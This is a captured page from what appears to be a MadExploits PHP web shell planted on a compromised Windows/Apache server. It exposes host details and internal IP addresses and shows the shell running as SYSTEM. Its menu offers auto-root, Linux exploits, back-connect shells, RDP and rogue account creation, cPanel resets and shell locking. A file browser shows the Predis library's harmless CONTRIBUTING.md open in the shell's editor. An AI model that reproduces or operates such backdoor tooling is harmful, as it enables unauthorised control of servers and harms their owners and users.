Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
etc /
apps /
phpRedisAdmin /
vendor /
[ HOME SHELL ]
Name
Size
Permission
Action
bin
[ DIR ]
drwxrwxrwx
examples
[ DIR ]
drwxrwxrwx
lib
[ DIR ]
drwxrwxrwx
.gitignore
72
B
-rw-rw-rw-
.travis.yml
384
B
-rw-rw-rw-
CHANGELOG.NAMING.md
3.19
KB
-rw-rw-rw-
CHANGELOG.md
31.27
KB
-rw-rw-rw-
CONTRIBUTING.md
2.59
KB
-rw-rw-rw-
FAQ.md
8.33
KB
-rw-rw-rw-
LICENSE
1.04
KB
-rw-rw-rw-
README.md
16.73
KB
-rw-rw-rw-
VERSION
6
B
-rw-rw-rw-
autoload.php
319
B
-rw-rw-rw-
composer.json
799
B
-rw-rw-rw-
package.ini
904
B
-rw-rw-rw-
phpunit.xml.dist
1.16
KB
-rw-rw-rw-
phpunit.xml.travisci
1.24
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CONTRIBUTING.md
## Filing bug reports ## Bugs or feature requests can be posted on the [GitHub issues](http://github.com/nrk/predis/issues) section of the project. When reporting bugs, in addition to the obvious description of your issue you __must__ always provide some essential information about your environment such as: 1. version of Predis (check the `VERSION` file or the `Predis\Client::VERSION` constant). 2. version of Redis (check `redis_version` returned by [`INFO`](http://redis.io/commands/info)). 3. version of PHP. 4. name and version of the operating system. 5. when possible, a small snippet of code that reproduces the issue. __Think about it__: we do not have a crystal ball and cannot predict things or peer into the unknown so please provide as much details as possible to help us isolating issues and fix them. __Never__ use GitHub issues to post generic questions about Predis! When you have questions about how Predis works or how it can be used, please just hop me an email and I will get back to you as soon as possible. ## Contributing code ## If you want to work on Predis, it is highly recommended that you first run the test suite in order to check that everything is OK and report strange behaviours or bugs. When modifying Predis please make sure that no warnings or notices are emitted by PHP running the interpreter in your development environment with the `error_reporting` variable set to `E_ALL | E_STRICT`. The recommended way to contribute to Predis is to fork the project on GitHub, create topic branches on your newly created repository to fix bugs or add new features (possibly with tests covering your modifications) and then open a pull request with a description of the applied changes. Obviously you can use any other Git hosting provider of your preference. We always aim for consistency in our code base so you should follow basic coding rules as defined by [PSR-1](https://github.com/php-fig/fig-standards/blob/master/accepted/PSR-1-basic-coding-standard.md) and [PSR-2](https://github.com/php-fig/fig-standards/blob/master/accepted/PSR-2-coding-style-guide.md) and stick with the conventions used in Predis to name classes and interfaces. Indentation should be done with 4 spaces and code should be wrapped at 100 columns (please try to stay within this limit even if the above mentioned official coding guidelines set the soft limit to 120 columns). Please follow these [commit guidelines](http://git-scm.com/book/ch5-2.html#Commit-Guidelines) when committing your code to Git and always write a meaningful (not necessarily extended) description of your changes before opening pull requests.
Close